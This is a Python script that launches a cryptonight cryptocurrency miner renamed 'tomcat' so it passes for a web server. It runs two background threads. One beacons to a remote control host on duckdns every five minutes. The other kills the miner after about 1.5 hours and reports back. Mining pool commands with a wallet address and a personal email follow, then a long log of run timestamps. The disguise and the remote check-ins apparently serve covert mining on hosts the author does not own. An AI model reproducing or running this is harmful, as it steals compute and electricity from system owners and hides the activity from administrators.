import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:05.832534
#2018-02-17 15:58:03.412646
#2018-02-17 17:45:04.780326
#2018-02-17 19:34:03.898121
#2018-02-17 21:23:05.292955
#2018-02-17 23:07:06.208835
#2018-02-18 00:55:01.526614
#2018-02-18 02:43:06.362587
#2018-02-18 04:35:08.461983
#2018-02-18 06:26:07.468949
#2018-02-18 08:16:01.804986
#2018-02-18 10:04:05.204515
#2018-02-18 11:51:01.254974
#2018-02-18 13:36:02.147619
#2018-02-18 15:26:05.405082
#2018-02-18 17:15:07.978470
#2018-02-18 19:03:07.407744
#2018-02-18 20:50:06.940825
#2018-02-18 22:36:05.879645
#2018-02-19 00:24:05.500167
#2018-02-19 02:10:07.698513
#2018-02-19 03:56:05.856211
#2018-02-19 05:40:01.631762
#2018-02-19 07:28:01.602936
#2018-02-19 09:18:02.012075
#2018-02-19 11:07:06.315796
#2018-02-19 12:54:04.794205
#2018-02-19 14:43:04.292764
#2018-02-19 16:32:08.933646
#2018-02-19 18:19:07.603635
#2018-02-19 20:05:07.698395
#2018-02-19 21:53:05.101433
#2018-02-19 23:39:01.255660
#2018-02-20 01:26:05.084885
#2018-02-20 03:15:07.093475
#2018-02-20 05:03:02.071814
#2018-02-20 06:46:01.422864
#2018-02-20 08:33:04.215760
#2018-02-20 10:17:06.459699
#2018-02-20 12:02:01.491521
#2018-02-20 13:50:11.056788
#2018-02-20 15:36:01.754422
#2018-02-20 17:21:09.551461
#2018-02-20 19:12:08.363748
#2018-02-20 21:01:06.818791
#2018-02-20 22:46:06.255658
#2018-02-21 00:29:05.888117
#2018-02-21 02:15:06.674589
#2018-02-21 04:05:06.630113
#2018-02-21 05:53:06.385179
#2018-02-21 07:42:02.077146
#2018-02-21 09:27:06.738831
#2018-02-21 11:17:09.480501
#2018-02-21 13:04:04.664806
#2018-02-21 14:52:06.898395
#2018-02-21 16:39:09.416073
#2018-02-21 18:29:08.114488
#2018-02-21 20:15:07.115670
#2018-02-21 22:05:02.885217
#2018-02-21 23:51:06.003838
#2018-02-22 01:40:08.545108
#2018-02-22 03:29:05.920793
#2018-02-22 05:17:04.630475
#2018-02-22 07:01:06.327629
#2018-02-22 08:47:08.615611
#2018-02-22 10:35:08.842263
#2018-02-22 12:23:01.371068
#2018-02-22 14:08:02.087112
#2018-02-22 15:54:08.736081
#2018-02-22 17:41:10.805592
#2018-02-22 19:29:08.433741
#2018-02-22 21:22:01.853469
#2018-02-22 23:08:07.143385
#2018-02-23 00:55:04.032638
#2018-02-23 02:42:04.578866
#2018-02-23 04:30:08.287164
#2018-02-23 06:15:06.296017
#2018-02-23 08:03:05.637271
#2018-02-23 10:18:07.108408
#2018-02-23 12:12:10.415500
#2018-02-23 13:58:07.100278
#2018-02-23 15:51:05.147053
#2018-02-23 17:38:04.917970
#2018-02-23 19:25:04.290723
#2018-02-23 21:08:04.338163
#2018-02-23 22:55:01.858980
#2018-02-24 00:43:03.640949
#2018-02-24 02:35:08.138703
#2018-02-24 04:28:07.512907
#2018-02-24 06:14:06.406883
#2018-02-24 08:02:05.729636
#2018-02-24 09:45:07.049813
#2018-02-24 11:40:06.460539
#2018-02-24 13:31:04.583471
#2018-02-24 15:19:06.959758
#2018-02-24 17:09:03.516729
#2018-02-24 19:01:01.912772
#2018-02-24 20:48:06.820216
#2018-02-24 23:05:08.303051
#2018-02-25 02:22:03.775794
#2018-02-25 05:50:08.421097
#2018-02-25 11:37:05.601848